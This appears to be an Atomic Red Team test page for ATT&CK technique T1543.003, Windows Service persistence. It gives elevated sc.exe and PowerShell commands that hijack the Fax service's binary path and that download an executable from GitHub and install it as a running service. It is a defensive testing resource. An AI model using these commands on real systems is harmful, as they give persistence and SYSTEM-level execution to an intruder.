T1543.003.md

T1543.003 - Windows Service

Description from ATT&CK

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.

An adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.

Atomic Tests

• Atomic Test #1 - Modify Fax service to run PowerShell

• Atomic Test #2 - Service Installation CMD

• Atomic Test #3 - Service Installation PowerShell

Atomic Test #1 - Modify Fax service to run PowerShell

This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for Fax to spawn powershell. Powershell will then spawn.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax

Cleanup Commands:

sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1

Atomic Test #2 - Service Installation CMD

Download an executable from github and start it as a service. Upon successful execution, powershell will download AtomicService.exe from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
binary_path	Name of the service binary, include path.	Path	PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_name	Name of the Service	String	AtomicTestService_CMD

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}

Cleanup Commands:

sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1

Dependencies: Run with powershell!

Description: Service binary must exist on disk at specified location (#{binary_path})

Check Prereq Commands:

if (Test-Path #{binary_path}) {exit 0} else {exit 1} 

Get Prereq Commands:

New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"

Atomic Test #3 - Service Installation PowerShell

Installs A Local Service via PowerShell. Upon successful execution, powershell will download AtomicService.exe from github. Powershell will then use New-Service and Start-Service to start service. Results will be displayed.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
binary_path	Name of the service binary, include path.	Path	PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_name	Name of the Service	String	AtomicTestService_PowerShell

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"

Cleanup Commands:

Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}

Dependencies: Run with powershell!

Description: Service binary must exist on disk at specified location (#{binary_path})

Check Prereq Commands:

if (Test-Path #{binary_path}) {exit 0} else {exit 1} 

Get Prereq Commands:

New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"